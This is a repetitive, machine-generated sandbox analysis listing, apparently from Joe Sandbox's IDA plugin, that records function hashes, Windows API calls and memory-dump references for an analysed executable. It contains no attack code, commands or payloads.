                                                                                                                                                                                                                                                                                                        • Opcode ID: 1b010308ae01caa29dd15e363a6b31251e7c990d0e2543f36367b48ca0cd6f2f
                                                                                                                                                                                                                                                                                                        • Instruction ID: a797358a44d08b39b3794d7da07d42e7b5544e976d7fbced95b279a1b43034b7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b010308ae01caa29dd15e363a6b31251e7c990d0e2543f36367b48ca0cd6f2f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A21D671304121AFE7549B24C985FAA7B95FF95324F148268F8A68F2C2C776EC41CBD0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0102D8CE
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0102D92F
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 0102D943
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 94cdd4d22fde5946bf4a0422f29d544fbaaa31191d47ef450f276d119078d483
                                                                                                                                                                                                                                                                                                        • Instruction ID: f68a8c24fa9b62259f24b6458aaad537abbb8e769cff83be51c41b6cb1bd9e9e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94cdd4d22fde5946bf4a0422f29d544fbaaa31191d47ef450f276d119078d483
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2221B0B5600715AFE7709FA9C988BAA7BF9AB40314F10445EF68692142E774EE05CB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010196E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,01018271,?,000000FF,?,010190BB,00000000,?,0000001C,?,?), ref: 010196F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010196E4: lstrcpyW.KERNEL32(00000000,?,?,01018271,?,000000FF,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 01019719
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010196E4: lstrcmpiW.KERNEL32(00000000,?,01018271,?,000000FF,?,010190BB,00000000,?,0000001C,?,?), ref: 0101974A
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 0101828A
                                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 010182B0
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 010182EB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                        • String ID: cdecl
                                                                                                                                                                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9b5cd793a97dbf6508cad72482f5ad3bc2c588dc471b5ae9e016908d9edabaea
                                                                                                                                                                                                                                                                                                        • Instruction ID: c4ff5b537cac63fd41f54e0204f789061a4eb643efb2376b7e5641929960b967
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b5cd793a97dbf6508cad72482f5ad3bc2c588dc471b5ae9e016908d9edabaea
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53112C7A200341ABCB159F78C844E7A77E5FF49750B00802BF982C7258EF359501D750
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 0104615A
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0104616C
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01046177
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 010462B5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c351df16482641684796d6714ce75f9e2531509a943c3f50b96a848639b5eab7
                                                                                                                                                                                                                                                                                                        • Instruction ID: bec96feef5eed4788a5b13d89754e847cb43b2901b4116c0c0efe19c5e8634c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c351df16482641684796d6714ce75f9e2531509a943c3f50b96a848639b5eab7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C11B1B5610208A7EB20DFA8CCC4AEE7BACEB12750B14407BFA91D6182FB75D540CB61
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01012394
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 010123A6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 010123BC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 010123D7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00FB1AF4
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FF31F9
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00FF3203
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FF320E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0101EB14
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0101EB47
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0101EB5D
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0101EB64
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,?,00FDD369,00000000,00000004,00000000), ref: 00FDD588
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FDD594
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FDD59B
                                                                                                                                                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 00FDD5B9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB78B1
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00FB78C5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB78CF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00FE338D,00000364,00000000,00000000,00000000,?,00FE35FE,00000006,FlsSetValue), ref: 00FE3418
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00FE338D,00000364,00000000,00000000,00000000,?,00FE35FE,00000006,FlsSetValue,01053260,FlsSetValue,00000000,00000364,?,00FE31B9), ref: 00FE3424
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FE338D,00000364,00000000,00000000,00000000,?,00FE35FE,00000006,FlsSetValue,01053260,FlsSetValue,00000000), ref: 00FE3432
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BA8B
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BAB0
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BABA
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BAED
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0104888E
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 010488A6
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 010488CA
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 010488E5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a2c6e8ec4842ee40fa476934589bf7dcf7ac7a7c347da4eb089904fdb1ef5ccf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 092e3b9b20d1da0bd0ebbe29b35d600ebf4d9f35a0eaaa7450fff886d91d620e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2c6e8ec4842ee40fa476934589bf7dcf7ac7a7c347da4eb089904fdb1ef5ccf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B1142B9D00209EFDB51CFE8D584AEEBBF5FB08214F108166E955E3214D735AA54CF50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01013712
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 01013723
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0101372A
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01013731
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f8aece6056c866385630be6faa2fd9195f35c55c5167d6a36b9e34f725495d77
                                                                                                                                                                                                                                                                                                        • Instruction ID: b853b5a7f7765108659ceefd4fc7240fc2d6a9cfc09a8c6e50f5eac90a624624
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8aece6056c866385630be6faa2fd9195f35c55c5167d6a36b9e34f725495d77
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19E06DB52012247BDA3056A6AD8DEEB7F6CFB56BB1F000015F649D6084DAA9C440D3B0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB1F87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1F96
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: BeginPath.GDI32(?), ref: 00FB1FAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1FD6
                                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 010492E3
                                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 010492F0
                                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 01049300
                                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 0104930E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b5f390c17f5130a2fa72eb18b16495012ea080f573aed14076174861828446c9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 25295c7b4114ef899e0cb61064b6a493b1e7dda5cb922ef241e2d9b604b0edd2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5f390c17f5130a2fa72eb18b16495012ea080f573aed14076174861828446c9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF0BE71005258BBDB222F94AD0EFCE3F59AF1A361F008100FA91220D5C37A5161DFE5
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00FB21BC
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00FB21C6
                                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00FB21D9
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00FB21E1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 48fc57875d50b97d778b72186d20c0e40f6dae82013bde58f71eaa538a3e0da8
                                                                                                                                                                                                                                                                                                        • Instruction ID: b66910069250877e1448314ef9604189c726473f4c5566ab89b5900dad0a538e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48fc57875d50b97d778b72186d20c0e40f6dae82013bde58f71eaa538a3e0da8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE06575640244BBDB315BB4A849BEC3B21AB25335F048219FBF5540E4C7768640AB10
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0100EC36
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 0100EC40
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100EC60
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 0100EC81
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30475346a5b3280e2f9f1991365065c8910ac3705553d435220e8994952ac55a
                                                                                                                                                                                                                                                                                                        • Instruction ID: a3725c718f868d7b547337830c6269bfeba01745dd682398a3f91361f16e6038
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30475346a5b3280e2f9f1991365065c8910ac3705553d435220e8994952ac55a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DEE01AB9D00204DFCB619FE0C688B5DBBB1EB28310F108409F88AE3244C73E5942AF00
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0100EC4A
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 0100EC54
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100EC60
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 0100EC81
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 15572027c2d73c1bb96d1a36aa40a04089aa86aa6913f7434e60dfe048de8422
                                                                                                                                                                                                                                                                                                        • Instruction ID: 38153ec4ce8850258eede01a7f999dc18fc34a08d9cf6dbc607affab7b14babe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15572027c2d73c1bb96d1a36aa40a04089aa86aa6913f7434e60dfe048de8422
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E01AB9D00204DFCB609FE0C688A5DBBB1AB28310B108409F88AE3244C73D5901AF00
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01025919
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: *$LPT
                                                                                                                                                                                                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                        • Opcode ID: ad2e6c095b635c73a7943df57f871046284bddda13295f0a7f66f1d4186ff20c
                                                                                                                                                                                                                                                                                                        • Instruction ID: d298a0f2241d40e006383f97aa350c681d844f2a3d09302364409c8e26418346
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad2e6c095b635c73a7943df57f871046284bddda13295f0a7f66f1d4186ff20c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E919D75A002149FDB14CF58C885EEABBF5AF44304F188099E88A9F362C775EE85CF94
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00FDE67D
